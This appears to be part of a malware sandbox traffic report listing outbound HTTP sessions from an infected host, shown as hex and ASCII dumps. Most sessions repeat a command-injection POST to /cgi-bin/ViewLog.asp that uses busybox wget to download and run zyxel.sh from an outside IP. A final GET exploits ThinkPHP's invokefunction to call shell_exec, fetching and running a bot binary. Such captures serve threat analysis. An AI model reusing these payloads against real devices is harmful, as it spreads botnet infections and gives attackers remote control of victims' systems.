                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 34 32 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.42</h3></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              163192.168.2.234565894.121.74.1838080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.126960993 CET4200OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              164192.168.2.234840831.200.116.668080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.130043983 CET4200OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              165192.168.2.235572694.120.243.1628080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.147531986 CET4202OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              166192.168.2.235323831.136.85.1268080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.454432964 CET4209OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:34.449088097 CET4325OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:36.432749033 CET4557OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:40.464278936 CET5039OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:48.399194002 CET5997OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.269120932 CET7947OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.520859003 CET11893OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              167192.168.2.233768031.136.18.2048080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.454653978 CET4209OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:34.449103117 CET4325OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:36.432755947 CET4557OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:40.464267969 CET5039OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:48.399202108 CET5998OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.269097090 CET7947OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.520888090 CET11895OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              168192.168.2.234089031.136.13.1948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.455274105 CET4210OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:34.449088097 CET4324OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:36.432810068 CET4557OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:40.464247942 CET5038OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:48.399358988 CET5998OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.269090891 CET7947OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:36.520885944 CET11895OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              169192.168.2.235457485.253.217.1728080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:33.483145952 CET4211OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              17192.168.2.2357258112.4.150.14280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:01.663682938 CET441OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:02.112792969 CET553INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:17:48 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
